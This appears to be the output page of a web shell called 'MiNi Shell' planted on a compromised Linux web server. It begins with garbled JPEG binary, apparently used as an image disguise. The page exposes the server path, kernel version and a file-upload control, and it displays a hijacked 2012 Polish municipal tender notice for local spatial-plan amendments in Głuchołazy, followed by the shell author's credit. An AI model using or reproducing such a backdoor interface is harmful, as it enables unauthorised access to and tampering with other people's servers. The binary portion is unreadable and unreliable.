JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/290524-N-2012.html

<p class="kh_header"><b>Głuchołazy: Sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar w rejonie ulic Powstańców Śląskich i Kolonia Kaszubska w Głuchołazach i we wsi Konradów oraz sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar Zdroju w rejonie ul. Andersa w Głuchołazach</b><br>
<b>Numer ogłoszenia: 290524 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Głuchołaz , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 077 4092100, faks 077 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar w rejonie ulic Powstańców Śląskich i Kolonia Kaszubska w Głuchołazach i we wsi Konradów oraz sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar Zdroju w rejonie ul. Andersa w Głuchołazach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar w rejonie ulic Powstańców Śląskich i Kolonia Kaszubska w Głuchołazach i we wsi Konradów oraz sporządzenie projektu  zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar Zdroju w rejonie ul. Andersa w Głuchołazach zgodnie z:
1. Uchwałą Nr XX/208/12 Rady Miejskiej w Głuchołazach z dnia 30 maja 2012r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar w rejonie ulic Powstańców Śląskich i Kolonia Kaszubska w Głuchołazach i we wsi Konradów.
 
Granice terenu objętego projektem zmiany planu zaznaczone są na załączniku graficznym do w/w uchwały.
Teren wnioskowany do objęcia zmianą oznaczony jest symbolem 3MW, o podstawowym przeznaczeniu dla zabudowy mieszkaniowej wielorodzinnej i dopuszczalnym dla zabudowy jednorodzinnej oraz usług, przy czym dopuszcza się usługi wbudowane na poziomie parteru. Planowana zmiana planu ma na celu zmianę zapisów dotyczących w/w terenu pod kątem wprowadzenia ustaleń umożliwiających realizację także funkcji usługowej w zakresie turystyki (np. hotel, motel, schronisko młodzieżowe), rekreacji i wypoczynku , zdrowia (np. dom spokojnej starości) i gastronomii. 
2. Uchwałą Nr XII/136/11 Rady Miejskiej w Głuchołazach z dnia 28 września 2011r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego obejmującego obszar Zdroju w rejonie ul. Andersa w Głuchołazach 
Granice terenów objętych projektem zmiany planu zaznaczone są na załącznikach graficznych do w/w uchwały.
Teren wnioskowany do objęcia zmianą położony w rejonie terenu oznaczonego symbolem 13MN - tereny zabudowy mieszkaniowej niskiej intensywności, a częściowo w pasie drogowym drogi oznaczonej symbolem 33KDL. Planowana zmiana planu ma na celu korektę przebiegu drogi.
Teren wnioskowany do objęcia zmianą w rejonie terenu oznaczonego symbolem 28P - tereny obiektów produkcyjnych. Planowana zmiana planu ma na celu zmianę zapisów dotyczących w/w terenu pod kątem wprowadzenia ustaleń umożliwiających realizację także funkcji usługowej, mieszkaniowej oraz produkcyjnej.
 
1.Wymagania techniczne (do każdego projektu miejscowego planu zagospodarowania przestrzennego):
Zakres zamówienia: merytoryczne i techniczne opracowanie projektu planu.
a)Sporządzenie projektu zmiany  miejscowego planu zagospodarowania przestrzennego w formie projektu uchwały wraz z wymagalnymi załącznikami, w tym załącznikiem graficznym - rysunkiem planu w skali 1:1000 i zgodnie z obowiązującą ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 poz. 1587), oraz przepisami innych ustaw związanych z problematyką planowania przestrzennego oraz zgodnie 
z projektem umowy.
b)Przeprowadzenie strategicznej oceny oddziaływania na środowisko w tym:
sporządzenie prognozy oddziaływania na środowisko przyrodnicze, o której mowa 	w art. 17 pkt. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu 	przestrzennym - zgodnie z ustawą z dnia 3 października 2008r. o udostępnianiu 	informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie 	środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. Nr 199, poz. 1227 
z późn. zm.), spełniającej wymogi przepisów szczególnych co do formy i zakresu 	prognozy, w ilości koniecznej do uzyskania uzgodnień + egzemplarz dla 	Zamawiającego. 
c)Sporządzenie prognozy skutków finansowych uchwalenia zmiany planu miejscowego, o której mowa w art. 17 pkt. 5 ustawy z dnia 27 marca 2003 r. o planowaniu 
i zagospodarowaniu przestrzennym, uwzględniając wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 poz. 1587). 
d)Udział w czynnościach związanych z sporządzeniem projektu zmiany planu miejscowego, udział w spotkaniach merytorycznych w siedzibie Zamawiającego dot. przedmiotu wykonywanych prac, czynny udział w dyskusji publicznej podczas wyłożenia projektów do publicznego wglądu, w razie potrzeby udział w spotkaniu z Radą Miejską, posiedzeniach Gminnej Komisji Urbanistyczno-Architektonicznej
e)Czynny udział w dyskusji publicznej, o której mowa w art. 17 pkt 10 cyt. ustawy, 
a także sesjach Rady Miejskiej, na których będą rozpatrywane sprawy przedmiotowego planu.
f)Czynny udział w analizie i rozpatrywaniu wniosków, o których mowa w art. 17 pkt 12 cyt. ustawy.
g)Przygotowanie i zredagowanie projektów wszystkich ogłoszeń, obwieszczeń, pism 
i odpowiednich dokumentów związanych z trybem formalno - prawnym (sporządzania, uzgadniania i opiniowania projektu zmiany  planu i prognozy).
h)Uzyskanie opinii i uzgodnień dotyczących projektu zmiany  planu, zgodnie z art. 17 pkt 6a i 6b cyt. ustawy. Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu  zmiany planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
i)Wprowadzenie zmian do projektu  zmiany planu zagospodarowania przestrzennego , 
o których mowa w art. 17 pkt 9 cyt. ustawy.
j)Sporządzenie dokumentacji prac planistycznych, o której mowa w §12 rozporządzenia Ministra Infrastruktury z dnia 26.08.2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. nr 164, poz. 1587 
z 2003 r.).
k)Zakończenie czynności formalno-prawnych związanych z opracowaniem projektu zmiany planu wraz z wprowadzeniem zmian do tego projektu wynikających
 z rozpatrzenia uwag i wniosków złożonych do projektu planu.
l)Projekt zmiany  planu wykonany zostanie w następującej formie:
- Część tekstowa - w formie uchwały w formacie Word i w standardzie Edytora 	Aktów Prawnych XML;
- Część graficzna - w formie map w skali 1:500 lub 1:1000 zgodnie z wymogami 	ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym 
(Dz. 	U. z 2003 r. Nr 80 poz. 717 z późn. zm.) i odpowiednich przepisów	wykonawczych, oraz  w formacie PDF, jpg na odpowiednich nośnikach.
2Wymagania użytkowe (do każdego projektu miejscowego planu zagospodarowania przestrzennego):
a)Opracowanie projektu zmiany planu miejscowego winno nastąpić w oparciu
 o obowiązujące przepisy prawa, a w szczególności zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. nr 80, poz. 717 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. nr 164 poz. 1587) i ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. nr 25, poz. 150 tekst jednolity z późn. zm.) oraz ustawą z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa o ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008r. Nr 199 poz. 1227).
b)Zakres ustaleń projektu zmiany planu winien spełniać wymagania określone w art. 15 ust. 2 i 3 ustawy o planowaniu i zagospodarowaniu przestrzennym.
c)Wykonawca zamówienia zobowiązany jest do przedstawienia koncepcji projektu zmiany planu Zamawiającemu przed przekazaniem projektu do zaopiniowania przez Gminną Komisję Urbanistyczno - Architektoniczną.
d)Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się 
w trakcie opracowania projektu  zmiany planu miejscowego i przekazywania ich Zamawiającemu.
e)Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienie projektu zmiany planu przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
f)Zamawiającemu należy przekazać  po 2 egz. planu w wersji jak opisana w pkt 2 lit.l.  
g)Wykonawca zamówienia zobowiązany jest do przeniesienia na Zamawiającego praw autorskich do wykorzystania ich w realizacji planu.
h)Wykonawca zamówienia zobowiązany jest do przygotowania dokumentacji planistycznej celem przedłożenia wojewodzie do oceny zgodności z prawem, 
a w razie konieczności ponowienia procedury ( w całości lub części), i ewentualnie 
do ponownego udziału w procedurze..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt. 6 ustawy Pzp. stanowiących nie więcej niż 50 % wartości  zamówienia podstawowego. Zamówienia uzupełniające  będą obejmowały  możliwość opracowania punktowej zmiany miejscowego planu zagospodarowania przestrzennego jednego lub dwóch obowiązujących miejscowych planów (obecnie brak uchwał o przystąpieniu do zmiany planu miejscowego).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawcy muszą spełnić następujące warunki (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie):wykażą się posiadaniem wiedzy i doświadczenia, tj.: wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali usługi o charakterze i złożoności podobnej do przedmiotu niniejszego zamówienia: tj. minimum dwie usługi polegające na opracowaniu projektu miejscowego planu zagospodarowania przestrzennego terenu lub minimum dwie usługi polegające na opracowaniu projektu zmian miejscowego planu zagospodarowania przestrzennego terenu lub  minimum dwie usługi z których jedna polega na opracowaniu projektu miejscowego planu zagospodarowania przestrzennego terenu , a druga na opracowaniu projektu zmian miejscowego planu zagospodarowania przestrzennego terenu - z podaniem  rodzaju i wartości brutto usług, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Wykonawcy muszą spełnić następujące warunki (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne kwalifikacje):
wykażą się osobą zdolną do wykonania zamówienia tj.: dysponowaniem wykwalifikowaną osobą, która będzie uczestniczyć w wykonaniu niniejszego zamówienia, w szczególności odpowiedzialnej za świadczenie usług, wraz 
z informacjami na temat jej kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją 
o podstawie do dysponowania tą osobą;
Wykonawca winien dysponować osobą, która będzie uczestniczyć w wykonywaniu zamówienia legitymująca się kwalifikacjami zawodowymi, wykształceniem odpowiednim do stanowiska, jakie jej zostanie powierzone oraz informacją 
o podstawie do dysponowania tą osobą: 
Główny projektant planu posiadający uprawnienia w specjalności urbanistycznej zgodnie z art. 2 ust. 3 oraz art.6 ust. 1 ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42, z późn. zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik Nr 1    do  IDW, 
b)  stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
c) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie niniejszego zamówienia publicznego, 
d)pozostałe dokumenty wymienione w pkt. 10  IDW,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy.
2.Zamawiający, przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy oraz określa warunki takiej zmiany w przypadku:
1)Zmiany Wykonawcy w związku z sukcesją generalną, przekształceniami spółek handlowych zgodnie z KSH, a także sukcesją z mocy prawa
2)W wypadku wszystkich zmian obiektywnie ocenianych, jako korzystne dla Zamawiającego w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności.
3)Jeżeli na skutek zmiany przepisów prawnych, które regulują tryb i sposób opracowania miejscowego planu, będzie wymagane sporządzenie dodatkowych dokumentów (opracowań), niezbędnych do uchwalenia miejscowego planu, oraz gdy w toku uzgadniania dokumentacji wyniknie konieczność sporządzenia dodatkowych dokumentów (opracowań), niezbędnych do uchwalenia miejscowego planu, Wykonawca ma prawo domagać się od Zamawiającego zmiany terminu wykonania umowy.
4)W przypadku uwzględnienia zgłoszonych uwag w trakcie wyłożenia do publicznego wglądu projektu planu i konieczności wprowadzenia zmian do projektu planu oraz dokonania dodatkowych uzgodnień i ewentualnie ponownego wyłożenia 
do publicznego wglądu, termin zgłoszenia projektu planu do zatwierdzenia może zostać przedłużony o czas niezbędny do przeprowadzenia w/w procedur wynikających z przepisów ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym /Dz. U. Nr 80, poz. 717, z późn. zm./
5)czas przewidziany na realizację poszczególnych etapów przedmiotu umowy ulega przedłużeniu o czas pozyskiwania materiałów wejściowych (objętych harmonogramem rzeczowo-terminowym stanowiącym załącznik do umowy) przez Wykonawcę w przypadku zlecenia przez Zamawiającego Wykonawcy pozyskania takich materiałów
6)zmiany personalnej osób uprawnionych do sprawowania samodzielnych funkcji technicznych z branż wymaganych przez Zamawiającego, która może nastąpić 
za zgodą Zamawiającego, na pisemny wniosek Wykonawcy lub na żądanie Zamawiającego wskazując powody i konieczność dokonania takiej zmiany, a przedstawiony do zmiany we wniosku kandydat na powyższe stanowiska musi spełniać odpowiednio warunki udziału w niniejszym postępowaniu, zgodnie z SIWZ Część I - IDW, pkt. 9.2.2 .
7)  Zamawiający  na pisemny wniosek Wykonawcy dopuszcza zmianę Podwykonawców w trakcie realizacji zamówienia. Zamawiającemu przysługuje również prawo żądania od Wykonawcy zmiany Podwykonawcy, jeżeli ten realizuje roboty w sposób wadliwy, niezgodny z założeniami niniejszej Umowy i przepisami obowiązującego prawa.  W przypadku gdy Wykonawca polegał na zasobach Podwykonawcy(wiedzy, doświadczeniu, potencjale technicznym i osobach lub zdolnościach finansowych  innych podmiotów) w celu wykazania spełnienia warunku udziału w postępowaniu o udzielenie zamówienia, zmiana Podwykonawcy  jest dopuszczalna, gdy nowy Podwykonawca spełnia warunki podane w specyfikacji istotnych warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2012&mc=8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach, 48-340 Głuchołazy, Rynek 15, Wydział Zamówień Publicznych pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2012 godzina 10:30, miejsce: Urząd Miejski w Głuchołazach, 48-340 Głuchołazy, Rynek 15, Sekretariat pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com